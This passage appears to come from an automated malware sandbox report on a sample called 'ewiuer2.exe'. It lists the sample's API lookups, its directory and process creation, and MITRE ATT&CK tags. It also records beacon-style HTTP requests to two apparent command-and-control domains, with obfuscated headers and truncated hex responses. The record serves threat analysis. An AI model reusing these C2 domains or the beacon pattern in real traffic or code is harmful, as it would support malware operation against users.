parameter RegQueryValueExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter BCryptGenRandom (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetRngInterface (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAGetOverlappedResult (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e516b@advapi32.DLL\"\n \"0e000f00703f516b@advapi32.DLL\"\n \"0e000f00cc3f516b@advapi32.DLL\"\n \"11001200b447516b@advapi32.DLL\"\n \"110012004848516b@advapi32.DLL\"\n \"120013008c48516b@advapi32.DLL\"\n \"12001300e448516b@advapi32.DLL\"\n \"14001500386e516b@advapi32.DLL\"\n \"14001500506e516b@advapi32.DLL\"\n \"14001500686e516b@advapi32.DLL\"\n \"17001800806e516b@advapi32.DLL\"\n \"0d000e00986e516b@advapi32.DLL\"\n \"11001200a86e516b@advapi32.DLL\"\n \"11001200bc6e516b@advapi32.DLL\"\n \"0d000e004466516b@WININET.dll\"\n \"0d000e00b466516b@WININET.dll\"\n \"10001100ec66516b@WININET.dll\"\n \"100011009067516b@WININET.dll\"\n \"10001100006f516b@WININET.dll\"\n \"10001100146f516b@WININET.dll\"\n \"14001500286f516b@WININET.dll\"\n \"14001500406f516b@WININET.dll\"\n \"12001300586f516b@WININET.dll\"\n \"120013006c6f516b@WININET.dll\"\n \"10001100d067516b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"ewiuer2.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\ewiuer2.exe\" - (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\ewiuer2.exe /nomove\" - (UID: 00000000-00004444)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"mkkuei4kdsz.com\"\n \"ow5dirasuek.com\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /457/533.html HTTP/1.1\nFrom: 133833028898974522\nVia: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:08:19 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /34/993.html HTTP/1.1\nFrom: 133833028898974522\nVia: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1\nHost: ow5dirasuek.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\nServer: nginx\nDate: Thu\n 06 Feb 2025 09:08:19 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: close\nSet-Cookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu\n 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;\nSet-Cookie: snkz=<IPv4>; path=/; Expires=Thu\n 15 Apr 2027 00:00:00 GMT with response body ==>300D0A0D0A.......\n \"GET /939/382.html HTTP/1.1\nFrom: 133833046141054708\nVia: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:08:27 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /644/428.html HTTP/1.1\nFrom: 133833046141054708\nVia: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5\nHost: ow5dirasuek.com\nConnection: Keep-Alive\nCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\" Response ==> HTTP/1.1 200 OK\nServer: nginx\nDate: Thu\n 06 Feb 2025 09:08:28 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: close\nSet-Cookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu\n 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; with response body ==>300D0A0D0A.......\n \"GET /987/678.html HTTP/1.1\nFrom: 133833046141054708\nVia: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:08:33 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /88/452.html HTTP/1.1\nFrom: 133833046141054708\nVia: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432\nHost: ow5dirasuek.com\nConnection: Keep-Alive\nCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\" Response ==> HTTP/1.1 200 OK\nServer: nginx\nDate: Thu\n 06 Feb 2025 09:08:34 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: close\nSet-Cookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu\n 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; with response body ==>300D0A0D0A.......\n \"GET /619/651.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28b\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:08:42 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /883/315.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28b\nHost: ow5dirasuek.com\nConnection: Keep-Alive\nCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\" Response ==> no response\n \"GET /22/867.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>56g;638/1:_c35c7a9f0c87ghaf41:6a_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:08:54 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /506/903.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:09:06 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n 